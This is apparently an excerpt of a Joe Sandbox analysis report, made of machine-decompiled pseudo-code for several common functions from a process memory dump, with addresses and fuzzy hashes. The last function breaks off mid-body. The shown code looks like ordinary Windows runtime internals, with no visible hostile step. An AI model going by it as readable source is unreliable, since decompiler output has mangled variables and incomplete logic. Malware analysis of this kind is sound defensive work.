                                                      Function 04D89100 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04D89100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4e5f6e8);
				E04DDD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04E588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04DDD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4e786c0; // 0x3007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4e786b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04DA2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04E588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04DCAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4e7b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4e784c0;
										if(_t69 >=  *0x4e784c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04E59063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04D8922A(_t82);
							_t53 = E04DA7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04E58B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4e786c0; // 0x3007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4e786b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4e786bc;
										_t72 = 0x4e786b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04D89240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4e786c4;
									_t72 = 0x4e786c0;
									L18:
									E04DB9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                      0x04d89100
                                                      0x04d89100
                                                      0x04d89100
                                                      0x04d89100
                                                      0x04d89102
                                                      0x04d89107
                                                      0x04d8910c
                                                      0x04d89110
                                                      0x04d89115
                                                      0x04d89136
                                                      0x04d89143
                                                      0x04de37e4
                                                      0x04de37e4
                                                      0x04d89149
                                                      0x04d8914e
                                                      0x04d8914e
                                                      0x04d89117
                                                      0x04d8911d
                                                      0x00000000
                                                      0x00000000
                                                      0x04d8911f
                                                      0x04d89125
                                                      0x00000000
                                                      0x04d89151
                                                      0x04d89158
                                                      0x04d8915d
                                                      0x04d89161
                                                      0x04d89168
                                                      0x04de3715
                                                      0x00000000
                                                      0x04d8916e
                                                      0x04d8916e
                                                      0x04d89175
                                                      0x04d89177
                                                      0x04d8917e
                                                      0x04d8917f
                                                      0x04d89182
                                                      0x04d89182
                                                      0x04d89187
                                                      0x04d89187
                                                      0x04d8918a
                                                      0x04d8918d
                                                      0x04d8918f
                                                      0x04d89192
                                                      0x04d89195
                                                      0x04d89198
                                                      0x04d89198
                                                      0x04d89198
                                                      0x04d8919a
                                                      0x00000000
                                                      0x00000000
                                                      0x04de371f
                                                      0x04de3721
                                                      0x04de3727
                                                      0x04de372f
                                                      0x04de3733
                                                      0x04de3735
                                                      0x04de3738
                                                      0x04de373b
                                                      0x04de373d
                                                      0x04de3740
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3746
                                                      0x04de3749
                                                      0x00000000
                                                      0x00000000
                                                      0x04de374f
                                                      0x04de3751
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3757
                                                      0x04de3759
                                                      0x04de375c
                                                      0x04de375c
                                                      0x04de375e
                                                      0x04de375e
                                                      0x04de3761
                                                      0x04de3764
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3766
                                                      0x04de3768
                                                      0x04de37a3
                                                      0x04de37a3
                                                      0x04de37a5
                                                      0x04de37a7
                                                      0x04de37ad
                                                      0x04de37b0
                                                      0x04de37b2
                                                      0x04de37bc
                                                      0x04de37c2
                                                      0x04de37c2
                                                      0x04de37b2
                                                      0x04d89187
                                                      0x04d89187
                                                      0x04d8918a
                                                      0x04d8918d
                                                      0x04d8918f
                                                      0x04d89192
                                                      0x04d89195
                                                      0x00000000
                                                      0x04d89195
                                                      0x00000000
                                                      0x04d89187
                                                      0x04de376a
                                                      0x04de376a
                                                      0x04de376c
                                                      0x04de376c
                                                      0x04de376f
                                                      0x04de3775
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3777
                                                      0x04de3779
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3782
                                                      0x04de3787
                                                      0x04de3789
                                                      0x04de3790
                                                      0x04de3790
                                                      0x04de378b
                                                      0x04de378b
                                                      0x04de378b
                                                      0x04de3792
                                                      0x04de3795
                                                      0x04de3795
                                                      0x04de3798
                                                      0x04de3798
                                                      0x04de379b
                                                      0x04de379b
                                                      0x04d891a3
                                                      0x04d891a9
                                                      0x04d891b0
                                                      0x04d891b4
                                                      0x04d891b4
                                                      0x04d891bb
                                                      0x04d891c0
                                                      0x04d891c5
                                                      0x04d891c7
                                                      0x04de37da
                                                      0x04d891cd
                                                      0x04d891cd
                                                      0x04d891cd
                                                      0x04d891d2
                                                      0x04d891d5
                                                      0x04d89239
                                                      0x04d89239
                                                      0x04d891d7
                                                      0x04d891db
                                                      0x04d891e1
                                                      0x04d891e7
                                                      0x04d891fd
                                                      0x04d89203
                                                      0x04d8921e
                                                      0x04d89223
                                                      0x00000000
                                                      0x04d89223
                                                      0x04d89205
                                                      0x04d89208
                                                      0x04d8920c
                                                      0x04d89214
                                                      0x04d89214
                                                      0x04d891e9
                                                      0x04d891e9
                                                      0x04d891ee
                                                      0x04d891f3
                                                      0x04d891f3
                                                      0x04d891f3
                                                      0x04d891e7
                                                      0x00000000
                                                      0x04d891db
                                                      0x04d89187
                                                      0x04d89168

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3bbad50d6ffe3945750ddd80c5c938692895a92503d2cf530cd2109ea930ae24
                                                      • Instruction ID: bc53c7b2621804e66a1b97ea944a4548333ea1deea4837948b937181d23598d8
                                                      • Opcode Fuzzy Hash: 3bbad50d6ffe3945750ddd80c5c938692895a92503d2cf530cd2109ea930ae24
                                                      • Instruction Fuzzy Hash: 5A319DB5A04645DFEB21FFA9C098BBCBBF1BB48324F18858DC88467250D334B980CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DA0050 Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E04DA0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4e7d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04DB9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04DCB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04E58A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04DB9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4e7b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                      0x04da0055
                                                      0x04da005d
                                                      0x04da0062
                                                      0x04da006c
                                                      0x04da006f
                                                      0x04da0074
                                                      0x04da007a
                                                      0x04da007a
                                                      0x04da0080
                                                      0x04da0080
                                                      0x04da0087
                                                      0x04da008d
                                                      0x04da008f
                                                      0x04da0093
                                                      0x04da0095
                                                      0x04da009b
                                                      0x04da00f8
                                                      0x04da00fb
                                                      0x04da00fc
                                                      0x04da00ff
                                                      0x04da0108
                                                      0x04da0108
                                                      0x04da00a2
                                                      0x04da00a6
                                                      0x04da00b3
                                                      0x04da00bc
                                                      0x04da00c5
                                                      0x04da00ca
                                                      0x04dec01e
                                                      0x00000000
                                                      0x00000000
                                                      0x04dec02d
                                                      0x04da00d5
                                                      0x04da00d9
                                                      0x04dec03d
                                                      0x04dec046
                                                      0x04dec046
                                                      0x04da00df
                                                      0x04da00e2
                                                      0x04da00ea
                                                      0x04da00ef
                                                      0x04da00f2
                                                      0x04da00f6
                                                      0x04da0111
                                                      0x04da0117
                                                      0x04da0117
                                                      0x00000000
                                                      0x04da00f6
                                                      0x04da00d0
                                                      0x04da00d0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4f98fd9eefa6d781288065eb46f537d7736089f63a3f3233ae69c65393e4488
                                                      • Instruction ID: 885996f2c97c59f04556a921e413b80d970132b66b7609bb4815cf51fee632ca
                                                      • Opcode Fuzzy Hash: f4f98fd9eefa6d781288065eb46f537d7736089f63a3f3233ae69c65393e4488
                                                      • Instruction Fuzzy Hash: CA317831701A04CFD722CF28C844BAAB3E5FF88718F14856DE59A87A90EA35B801CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E06C0A Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E04E06C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04DA7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4e77b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04DA4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04DCF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04DA7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04DC9AE0();
						_t23 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                      0x04e06c0a
                                                      0x04e06c0f
                                                      0x04e06c10
                                                      0x04e06c13
                                                      0x04e06c15
                                                      0x04e06c19
                                                      0x04e06c1c
                                                      0x04e06c21
                                                      0x04e06c28
                                                      0x04e06c3a
                                                      0x04e06c2a
                                                      0x04e06c33
                                                      0x04e06c33
                                                      0x04e06c3f
                                                      0x04e06c48
                                                      0x04e06c4d
                                                      0x04e06c60
                                                      0x04e06c65
                                                      0x04e06c69
                                                      0x04e06c73
                                                      0x04e06c79
                                                      0x04e06c7f
                                                      0x04e06c86
                                                      0x04e06c90
                                                      0x04e06c94
                                                      0x04e06ca6
                                                      0x04e06cb2
                                                      0x04e06cbd
                                                      0x04e06cbd
                                                      0x04e06cc3
                                                      0x04e06cc7
                                                      0x04e06ccb
                                                      0x04e06cd0
                                                      0x04e06cd1
                                                      0x04e06ce2
                                                      0x04e06ce2
                                                      0x04e06c69
                                                      0x04e06ced

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3554cb7ad40a1dfe9c56c03ba09156923e754b6ac9a62de94b01b2cb0c17426
                                                      • Instruction ID: e3faf43637f484a7723433995c60ffbca3630533a5d18fc025b743e55e1deb39
                                                      • Opcode Fuzzy Hash: d3554cb7ad40a1dfe9c56c03ba09156923e754b6ac9a62de94b01b2cb0c17426
                                                      • Instruction Fuzzy Hash: 10219CB1A00644AFD715DF69D880F6AB7B8FF48748F1440AAF904D7791E634ED60CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC90AF Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E04DC90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04DDD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04DBE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04DA4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04DCF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04DBA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                      0x04dc90af
                                                      0x04dc90b8
                                                      0x04dc90bb
                                                      0x04dc90bf
                                                      0x04dc90c2
                                                      0x04dc90c2
                                                      0x04dc90c8
                                                      0x04dc90cb
                                                      0x04dc90cd
                                                      0x04e014d7
                                                      0x04e014eb
                                                      0x04e014eb
                                                      0x00000000
                                                      0x04e014eb
                                                      0x04e014db
                                                      0x04e014e6
                                                      0x00000000
                                                      0x04e014f2
                                                      0x04e014e8
                                                      0x00000000
                                                      0x04e014e8
                                                      0x04dc90d8
                                                      0x04dc90da
                                                      0x04dc90dd
                                                      0x04dc90e5
                                                      0x00000000
                                                      0x04dc9139
                                                      0x04dc90fa
                                                      0x04dc90fe
                                                      0x04dc9142
                                                      0x00000000
                                                      0x04dc9142
                                                      0x04dc9104
                                                      0x04dc9107
                                                      0x04dc910b
                                                      0x04dc9110
                                                      0x04dc9118
                                                      0x04dc9147
                                                      0x04dc9148
                                                      0x04dc914f
                                                      0x04dc9150
                                                      0x04dc9151
                                                      0x04dc9152
                                                      0x04dc9156
                                                      0x04dc915d
                                                      0x04dc9160
                                                      0x04dc9168
                                                      0x04dc916c
                                                      0x04dc91bc
                                                      0x04dc91be
                                                      0x00000000
                                                      0x04dc91be
                                                      0x04dc916e
                                                      0x04dc9173
                                                      0x04dc9176
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc917c
                                                      0x04dc9180
                                                      0x04dc91b5
                                                      0x00000000
                                                      0x04dc91b5
                                                      0x04dc9182
                                                      0x04dc9185
                                                      0x04dc9189
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc918e
                                                      0x04dc9190
                                                      0x04dc9198
                                                      0x00000000
                                                      0x00000000
                                                      0x04dc91a0
                                                      0x00000000
                                                      0x04dc91ad
                                                      0x04dc91ad
                                                      0x04dc91b0
                                                      0x04dc91b1
                                                      0x00000000
                                                      0x04dc9185
                                                      0x04dc911a
                                                      0x04dc911c
                                                      0x04dc911f
                                                      0x04dc9125
                                                      0x04dc9127
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: 1e91f3a892d6a06f6721dfe3f0f6a495f6b3dc58fe40e471722ac91b3dc1bcae
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: 0A2150B1A00605EFDB21DF59C845AAAF7F8EB44354F1488AEE995AB250E370FD44CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB3B7A Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E04DB3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4e784c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4e784c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4e784c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04DCAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04DCFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4e784c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4e784c4; // 0x0
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                      0x04db3b89
                                                      0x04db3b96
                                                      0x04db3ba1
                                                      0x04db3bab
                                                      0x04db3bb5
                                                      0x04db3bb9
                                                      0x04df6298
                                                      0x04db3bbf
                                                      0x04db3bc2
                                                      0x04db3bc3
                                                      0x04db3bc9
                                                      0x04db3bca
                                                      0x04db3bcc
                                                      0x04db3bcd
                                                      0x04db3bd4
                                                      0x04db3bd6
                                                      0x04db3bdb
                                                      0x04db3bea
                                                      0x04db3bf7
                                                      0x04db3bfb
                                                      0x04db3bff
                                                      0x04db3c09
                                                      0x04db3c0a
                                                      0x04db3c0b
                                                      0x04db3c0f
                                                      0x04db3c14
                                                      0x04db3c18
                                                      0x04db3c18
                                                      0x04db3bfb
                                                      0x04db3c1b
                                                      0x04db3c30
                                                      0x04db3c30
                                                      0x04db3c3d

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28ed711b4957b395f48db9137beb303c9a825a0ac82f9ebfb8e7ea000d99e481
                                                      • Instruction ID: d40fb4a0f7c9503006b2abc4537c29fae57ac760365ecf8a3fdfa9b8c23e049e
                                                      • Opcode Fuzzy Hash: 28ed711b4957b395f48db9137beb303c9a825a0ac82f9ebfb8e7ea000d99e481
                                                      • Instruction Fuzzy Hash: 852179B2A00108AFD705DF98CD85BAAB7A9FB44718F250068E909AB251D7B5ED119BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E06CF0 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E04E06CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04DA7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04DA7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4d65c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04DBF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
